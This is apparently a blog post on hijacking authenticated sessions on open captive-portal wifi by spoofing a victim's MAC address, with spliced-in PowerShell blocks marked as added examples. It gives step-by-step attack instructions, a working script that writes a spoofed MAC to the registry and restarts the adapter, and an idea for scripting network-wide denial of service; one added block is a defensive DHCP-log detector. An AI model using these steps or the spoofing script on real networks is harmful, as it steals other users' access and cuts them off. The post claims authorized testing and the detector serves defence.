How To Hijack an Authenticated Session on an Open Wifi Network

I discovered that it is fairly easy to hijack an authenticated user session on an "open" wifi network. Many businesses and schools run open networks that present a splash page (a captive portal web page) to users who try to reach the internet through the wireless network, both for access control and for resource management.

I tested this hijack method using Windows XP (rogue) and Windows 7 (victim) on a very sophisticated, enterprise-grade managed wifi system from Cisco that had just been installed (October 2011). I work as an all-around IT guy. I do a little coding, configure servers, construct automated software rollouts, set up Windows 7 deployments, and conduct research in my down time.

Noticing that the Cisco wifi controller managed access (authenticated against AD) based on MAC address, I wondered if I could just spoof the MAC and take over (use) the session of someone else who had already authenticated. This mimics a rogue, unauthorized user looking to gain access to the network, and it turns out to be super easy. The process also denies the legitimate user their access, so this is not nice.

I used Cain to gather a list of users (MACs) after connecting to the "open" part of the wifi network. Next, I changed my MAC in Windows XP (in the registry) to the MAC of my victim (taken from the list in Cain). Finally, I refreshed my NIC, which was then assigned the IP address (via DHCP) of my victim. So at this point we both have the same MAC and the same IP address. My machine, however, is able to browse the internet using what was once their session. Their machine is now crippled, unable to access anything.

They can reboot, which will refresh their IP address assignment (from DHCP) and grant them their authenticated session back, depriving me. All you have to do, however, is refresh (Disable/Enable) again to steal it back. Although I haven't tried it (yet), I presume you can write a script to cycle through the entire network stealing everyone's session in turn, basically denying service to everyone on the related VLANs.
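The lease ping-pong described above leaves a trail on the DHCP server: one MAC address keeps re-acquiring the same IP, and the client hostname carried in the request flips between two machines. The following PowerShell is an added example, not code from the original post (the author does not say which DHCP server the network used). It parses a few constructed lines in the Windows DHCP Server audit-log format (event 10 = new lease, 11 = renewal; fields ID,Date,Time,Description,IP Address,Host Name,MAC Address,...) and flags any MAC seen with more than one hostname or re-leased for the same IP within a short window. The sample lines, hostnames and the 30-minute threshold are all assumptions made for the example.

```powershell
# Added example, not from the original post. Flags MAC addresses whose DHCP history
# looks like the session-stealing ping-pong: the same MAC showing up with two
# different client hostnames, or re-leasing the same IP again within a short window.
# Input is the Windows DHCP Server audit-log line format; the lines below are constructed.

$SampleLog = @'
ID,Date,Time,Description,IP Address,Host Name,MAC Address,User Name,TransactionID,QResult,Probationtime,CorrelationID,Dhcid.
10,10/24/11,08:02:11,Assign,10.20.30.41,VICTIM-PC7.corp.example,001122334455,,123456,0,,,
10,10/24/11,08:03:40,Assign,10.20.30.57,OTHER-PC.corp.example,0A1B2C3D4E5F,,123457,0,,,
10,10/24/11,09:14:52,Assign,10.20.30.41,ROGUE-XP.corp.example,001122334455,,123458,0,,,
10,10/24/11,09:20:03,Assign,10.20.30.41,VICTIM-PC7.corp.example,001122334455,,123459,0,,,
10,10/24/11,09:21:30,Assign,10.20.30.41,ROGUE-XP.corp.example,001122334455,,123460,0,,,
11,10/24/11,12:03:40,Renew,10.20.30.57,OTHER-PC.corp.example,0A1B2C3D4E5F,,123461,0,,,
'@

function ConvertFrom-DhcpAuditLog {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Data rows start with the numeric event ID; skip the header and blank lines.
        if ($line -notmatch '^\d+,') { continue }
        $f = $line -split ','
        [pscustomobject]@{
            Id   = [int]$f[0]
            Time = [datetime]::ParseExact("$($f[1]) $($f[2])", 'MM/dd/yy HH:mm:ss',
                                          [cultureinfo]::InvariantCulture)
            Ip   = $f[4]
            Host = $f[5]
            Mac  = $f[6].ToUpper()
        }
    }
}

function Find-SuspiciousMacs {
    param([string[]]$LogLines, [int]$ChurnMinutes = 30)
    $leases = ConvertFrom-DhcpAuditLog $LogLines | Where-Object { @(10, 11) -contains $_.Id }
    foreach ($group in ($leases | Group-Object Mac)) {
        $events  = $group.Group | Sort-Object Time
        $hosts   = @($events | Select-Object -ExpandProperty Host | Sort-Object -Unique)
        $reasons = @()
        if ($hosts.Count -gt 1) {
            $reasons += "hostname flips between $($hosts -join ' and ')"
        }
        # Count new leases (event 10) that follow another new lease for the same IP
        # within $ChurnMinutes: a legitimate client renews, it does not keep re-acquiring.
        $assigns = @($events | Where-Object { $_.Id -eq 10 })
        $churn = 0
        for ($i = 1; $i -lt $assigns.Count; $i++) {
            $gap = ($assigns[$i].Time - $assigns[$i - 1].Time).TotalMinutes
            if ($assigns[$i].Ip -eq $assigns[$i - 1].Ip -and $gap -le $ChurnMinutes) { $churn++ }
        }
        if ($churn -gt 0) { $reasons += "$churn rapid re-lease(s) of the same IP" }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Mac     = $group.Name
                Ip      = ($events | Select-Object -ExpandProperty Ip | Sort-Object -Unique) -join ','
                Hosts   = $hosts -join ','
                Reasons = $reasons -join '; '
            }
        }
    }
}

# On the constructed sample only 001122334455 is reported: two hostnames, two rapid re-leases.
Find-SuspiciousMacs -LogLines ($SampleLog -split "`r?`n") | Format-Table -AutoSize
```

The hostname is whatever the client put in DHCP option 12, so an attacker who also copies the victim's computer name defeats the first check; the re-lease churn is harder to hide, because both machines keep fighting for the lease for as long as the victim stays on the network.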

I'm not 100% sure how you could mitigate this situation or prevent it, but I will be looking into this. I'm also curious to see if something like this can work on access points/VLANs requiring a key or under other configurations. I will be testing.

DISCLAIMER: I performed this as a research project to test a network which I was authorized to work on. Furthermore, I did not intrude on any user's access; both laptops were on my desk at the time. Performing this hack on a network without authorization can subject you to prosecution, so do not do this unless you are willing to pay the price.

UPDATE: The Cisco wifi system in question did detect and log the spoofing of the MAC addresses.

To Test

  • Leave the victim authenticated
  • Scan with Cain, find the victim's MAC
  • Change the rogue PC's MAC in the registry
  • Refresh or reboot the rogue PC
  • Enjoy internet access on the rogue
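The steps above, as an added PowerShell example; this is not the author's code, the post only describes editing the registry by hand. It writes the NetworkAddress value under the adapter's driver subkey in the network adapter class key (the same value changed in regedit), then disables and re-enables the adapter so the driver re-reads it and the DHCP client runs again with the new address. The adapter name and target MAC are placeholders, the lookup through Win32_NetworkAdapter's GUID property assumes Vista or later, and the whole thing needs an elevated prompt on a network you are authorized to test.

```powershell
# Added example, not from the original post: set a spoofed MAC on a Windows NIC
# the way the post describes (NetworkAddress value in the adapter's driver key),
# then bounce the adapter so the driver re-reads it and the DHCP client restarts.
# Requires an elevated prompt. $AdapterName and $NewMac are placeholders (assumptions).
param(
    [string]$AdapterName = 'Wireless Network Connection',
    [string]$NewMac      = '00-11-22-33-44-55'   # the victim's MAC from the Cain scan (placeholder)
)

# Network adapter class GUID; each NIC's driver settings live in a 4-digit subkey beneath it.
$NetClassKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}'

function Get-AdapterDriverKey {
    param([string]$Name)
    # Map the friendly connection name to its driver subkey via the adapter GUID
    # (Win32_NetworkAdapter.GUID equals the subkey's NetCfgInstanceId; Vista and later).
    $nic = Get-WmiObject Win32_NetworkAdapter -Filter "NetConnectionID='$Name'"
    if (-not $nic) { throw "No adapter with connection name '$Name'" }
    $key = Get-ChildItem $NetClassKey -ErrorAction SilentlyContinue | Where-Object {
        (Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue).NetCfgInstanceId -eq $nic.GUID
    } | Select-Object -First 1
    if (-not $key) { throw "No driver key found for '$Name'" }
    $key
}

function Restart-Adapter {
    param([string]$Name)
    # Same effect as Disable/Enable in the Network Connections folder.
    netsh interface set interface $Name admin=DISABLED | Out-Null
    Start-Sleep -Seconds 2
    netsh interface set interface $Name admin=ENABLED  | Out-Null
}

function Set-SpoofedMac {
    param([string]$Name, [string]$Mac)
    $hex = ($Mac -replace '[^0-9A-Fa-f]', '').ToUpper()
    if ($hex.Length -ne 12) { throw "'$Mac' is not a 48-bit MAC address" }
    $key = Get-AdapterDriverKey -Name $Name
    # NetworkAddress is a REG_SZ of 12 hex digits with no separators.
    Set-ItemProperty -Path $key.PSPath -Name 'NetworkAddress' -Value $hex -Type String
    Restart-Adapter -Name $Name
}

function Remove-SpoofedMac {
    param([string]$Name)
    # Deleting the value returns the adapter to its burned-in address.
    $key = Get-AdapterDriverKey -Name $Name
    Remove-ItemProperty -Path $key.PSPath -Name 'NetworkAddress' -ErrorAction SilentlyContinue
    Restart-Adapter -Name $Name
}

Set-SpoofedMac -Name $AdapterName -Mac $NewMac
# Confirm the driver accepted it: the Physical Address listed for the adapter should now be $NewMac.
getmac /v /fo list
```

Two caveats before trusting the result: on Windows 8 and later the netsh calls can be replaced with Disable-NetAdapter/Enable-NetAdapter, and many Windows Wi-Fi drivers only honour a NetworkAddress whose first octet has the locally administered bit set (second hex digit 2, 6, A or E). A copied factory MAC usually does not, so the driver may silently keep its burned-in address; check the getmac output rather than assuming the spoof took. Remove-SpoofedMac undoes the change when testing is finished.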


How To Spoof a MAC in Windows

Questions? Comments? Email: software@datavirtue.com